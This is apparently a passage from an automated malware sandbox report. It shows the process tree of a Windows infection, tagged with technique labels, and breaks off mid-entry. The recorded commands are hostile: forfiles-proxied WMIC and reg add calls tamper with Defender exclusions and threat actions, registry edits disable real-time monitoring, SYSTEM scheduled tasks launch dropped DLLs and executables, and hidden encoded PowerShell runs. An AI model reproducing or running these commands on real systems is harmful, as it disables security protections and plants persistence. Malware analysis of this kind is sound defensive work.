                                                                                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                            PID:2880
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                      • Indirect Command Execution
                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                      PID:1012
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:2448
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                            PID:2040
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                PID:2904
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BRWHUqYPU\lJICPE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MHiaqjbnoCNpItK" /V1 /F
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                        PID:4044
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /CREATE /TN "MHiaqjbnoCNpItK2" /F /xml "C:\Program Files (x86)\BRWHUqYPU\AGVbvzH.xml" /RU "SYSTEM"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                        PID:3948
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /END /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:2308
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /DELETE /F /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:2176
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /CREATE /TN "YQZkeEGXXGJdtu" /F /xml "C:\Program Files (x86)\GqgEBhsSxktU2\RrOFpXz.xml" /RU "SYSTEM"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                            PID:628
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /CREATE /TN "cosGrOuVCynQy2" /F /xml "C:\ProgramData\PdOICyyFbClqQxVB\DAfSTHJ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                            PID:924
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /CREATE /TN "PZmGxZPxdZZSPZWvU2" /F /xml "C:\Program Files (x86)\efiAzqQKrQpqActHLvR\HcoEbFk.xml" /RU "SYSTEM"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                            PID:3264
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /CREATE /TN "NzCzwfloobUmvfgYOrr2" /F /xml "C:\Program Files (x86)\OJMRwiGdhyaHC\uYUbPlP.xml" /RU "SYSTEM"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                            PID:2396
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /CREATE /TN "kjGlTxIfJQSbObiUU" /SC once /ST 15:03:23 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HIoTiJfsoGzpkHVf\FQjpGqjr\XdpCUmy.dll\",#1 /ZvLdidcMm 385121" /V1 /F
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                            PID:3076
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /run /I /tn "kjGlTxIfJQSbObiUU"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:3084
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\RzEIaSxk\HLXUlmV.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\RzEIaSxk\HLXUlmV.exe" /S 7m
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                              PID:3940
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                PID:2636
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Indirect Command Execution
                                                                                                                                                                                                                                  PID:2132
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                      PID:2532
                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                          PID:2924
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Indirect Command Execution
                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                      PID:3480
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:3560
                                                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                            PID:3852
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                        • Indirect Command Execution
                                                                                                                                                                                                                                        PID:3248
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:3344
                                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                PID:2400
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                                                                            PID:880
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:1480
                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                  PID:4068
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Indirect Command Execution
                                                                                                                                                                                                                                              PID:3620
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                PID:3608
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                  PID:1088
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                      PID:3156
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                              • Indirect Command Execution
                                                                                                                                                                                                                                              PID:2244
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:4056
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                                                    PID:3804
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                        PID:1688
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                  schtasks /CREATE /TN "bAqRDoFVIdSJfWxTlj" /SC once /ST 22:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\ZQusDmT.exe\" PV /S" /V1 /F
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                  PID:3580
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 464
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:2916
                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\FQjpGqjr\XdpCUmy.dll",#1 /ZvLdidcMm 385121
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:3444
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\FQjpGqjr\XdpCUmy.dll",#1 /ZvLdidcMm 385121
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                  PID:3440
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "kjGlTxIfJQSbObiUU"
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                    PID:2144
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\ZQusDmT.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\ZQusDmT.exe PV /S
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                PID:2044
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:3284
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Indirect Command Execution
                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                      PID:4044
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:3460
                                                                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                              PID:2448
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                          • Indirect Command Execution
                                                                                                                                                                                                                                                          PID:3640
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:2084
                                                                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                PID:1684
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                                                                                            PID:1688
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:2596
                                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                    PID:3972
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                                                                                                PID:4016
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:3692
                                                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                        PID:3932
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                    • Indirect Command Execution
                                                                                                                                                                                                                                                                    PID:2964
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:3808
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                                                          PID:2244
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                              PID:3840
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "gPTeyvpjo" /SC once /ST 14:46:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                      PID:3636
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks /run /I /tn "gPTeyvpjo"
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:2572
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "gPTeyvpjo"
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                        PID:2012
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:2448
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                                                                                                                            PID:3268
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:3856
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                                                                                                                              PID:3972
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "gdllSALpY" /SC once /ST 06:23:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                            PID:3932
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                            schtasks /run /I /tn "gdllSALpY"
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:3768
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                              schtasks /DELETE /F /TN "gdllSALpY"
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:2892
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
